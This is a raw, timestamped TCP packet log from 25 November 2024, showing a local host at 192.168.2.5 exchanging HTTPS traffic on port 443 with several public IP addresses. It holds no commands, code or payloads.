Nov 25, 2024 11:34:26.756668091 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.756695032 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.763458967 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.763487101 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.763528109 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.763535023 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.763561010 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.763575077 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.770484924 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.770509005 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.770550013 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.770562887 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.770581961 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.770596981 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.776707888 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.776738882 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.776763916 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.776772976 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.776793957 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.776813984 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.784028053 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.784059048 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.784085989 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.784092903 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.784120083 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.784140110 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.790143967 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.790172100 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.790201902 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.790210009 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.790230989 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.790249109 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.797077894 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.797101974 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.797137022 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.797147989 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.797158957 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.797182083 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.804119110 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.804145098 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.804186106 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.804193974 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.804213047 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.804231882 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.908221960 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.908246994 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.908324957 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.908349037 CET	50018	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:26.908375025 CET	50018	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:26.910161018 CET	50018	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:26.910181046 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.916157961 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:26.916198015 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:26.916199923 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:26.916228056 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:26.916614056 CET	50024	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:26.916639090 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.916707039 CET	50024	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:26.917007923 CET	50024	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:26.917016983 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.948440075 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.948472023 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.948534966 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.948564053 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.948585033 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.948611021 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.955471992 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.955493927 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.955543041 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.955550909 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.955566883 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.955595970 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.962414980 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.962435961 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.962500095 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.962506056 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.962544918 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.968594074 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.968612909 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.968661070 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.968666077 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.968698025 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.968719006 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.975939035 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.975960016 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.976011038 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.976016998 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.976063013 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.982094049 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.982114077 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.982171059 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.982191086 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.982208014 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.982229948 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.989068985 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.989095926 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.989161015 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.989167929 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.989207029 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.989783049 CET	443	50017	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:26.990256071 CET	50017	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:26.990282059 CET	443	50017	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:26.990849018 CET	50017	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:26.990854979 CET	443	50017	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:26.996041059 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.996063948 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.996121883 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.996126890 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.996155977 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.996315956 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.026269913 CET	443	50019	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.026700020 CET	50019	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.026722908 CET	443	50019	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.027298927 CET	50019	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.027304888 CET	443	50019	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.135401011 CET	443	50020	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.138740063 CET	50020	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.138756990 CET	443	50020	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.140027046 CET	50020	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.140033007 CET	443	50020	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.140948057 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.140973091 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.141026020 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.141048908 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.141067028 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.141088963 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.147867918 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.147893906 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.147955894 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.147964001 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.147996902 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.148014069 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.151381016 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.151915073 CET	50021	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.151933908 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.152395010 CET	50021	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.152401924 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.154005051 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.154036045 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.154089928 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.154093027 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.154135942 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.161019087 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.161041021 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.161093950 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.161102057 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.161112070 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.164050102 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.167989016 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.168015003 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.168057919 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.168065071 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.168088913 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.168107986 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.174671888 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.174691916 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.174773932 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.174786091 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.175502062 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.181512117 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.181526899 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.181593895 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.181601048 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.181699038 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.187711954 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.187726974 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.187817097 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.187823057 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.188041925 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.328243017 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.328277111 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.328316927 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.328375101 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:27.328377962 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.328408957 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:27.328423977 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:27.328717947 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:27.328739882 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.328753948 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:27.328762054 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.335655928 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.335676908 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.335750103 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.335778952 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.337730885 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.339612007 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.339632988 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.339709997 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.339719057 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.339910984 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.346484900 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.346499920 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.346568108 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.346574068 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.350532055 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.353517056 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.353539944 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.353581905 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.353594065 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.353624105 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.353646994 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.360093117 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.360111952 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.360157013 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.360177040 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.360205889 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.360219955 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.367218018 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.367280006 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.367299080 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.367322922 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.367347956 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.367371082 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.373235941 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.373258114 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.373311043 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.373317003 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.373352051 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.373366117 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.380201101 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.380228043 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.380296946 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.380321026 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.380490065 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.434814930 CET	443	50017	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.437935114 CET	443	50017	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.438014984 CET	50017	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.438065052 CET	50017	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.438086033 CET	443	50017	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.438097954 CET	50017	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.438103914 CET	443	50017	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.440685987 CET	50025	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.440726995 CET	443	50025	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.440809011 CET	50025	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.440962076 CET	50025	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.440973043 CET	443	50025	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.441102028 CET	443	50022	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.441447973 CET	50022	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.441469908 CET	443	50022	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.441874981 CET	50022	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.441880941 CET	443	50022	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.459979057 CET	443	50019	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.463551044 CET	443	50019	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.463666916 CET	50019	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.463762045 CET	50019	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.463772058 CET	443	50019	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.463781118 CET	50019	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.463785887 CET	443	50019	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.465854883 CET	50026	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.465886116 CET	443	50026	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.465959072 CET	50026	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.466085911 CET	50026	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.466099024 CET	443	50026	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.525490046 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.525518894 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.525600910 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.525628090 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.525955915 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.531594038 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.531615973 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.531677961 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.531699896 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.531873941 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.538661003 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.538686037 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.538794994 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.538819075 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.538889885 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.545564890 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.545587063 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.545674086 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.545694113 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.545984983 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.552088976 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.552109003 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.552207947 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.552216053 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.552412033 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.559098005 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.559119940 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.559186935 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.559192896 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.559377909 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.565352917 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.565366983 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.565426111 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.565432072 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.565504074 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.572329998 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.572345018 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.572407961 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.572413921 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.575072050 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.578748941 CET	443	50020	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.581818104 CET	443	50020	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.581904888 CET	50020	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.583220005 CET	50020	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.583239079 CET	443	50020	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.583250999 CET	50020	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.583256006 CET	443	50020	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.586091042 CET	50027	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.586142063 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.586234093 CET	50027	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.586407900 CET	50027	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.586419106 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.595087051 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.598185062 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.598234892 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.598234892 CET	50021	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.598289967 CET	50021	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.598330021 CET	50021	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.598345995 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.598357916 CET	50021	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.598364115 CET	443	50021	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.600569010 CET	50028	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.600600004 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.600680113 CET	50028	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.600817919 CET	50028	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.600831985 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.656907082 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.657624006 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:27.657636881 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.658365011 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:27.658371925 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.668329000 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:27.668344975 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:27.717341900 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.717371941 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.717449903 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.717475891 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.717926979 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.724344969 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.724363089 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.724417925 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.724425077 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.725460052 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.730540037 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.730559111 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.730612993 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.730623007 CET	443	50008	49.13.32.95	192.168.2.5
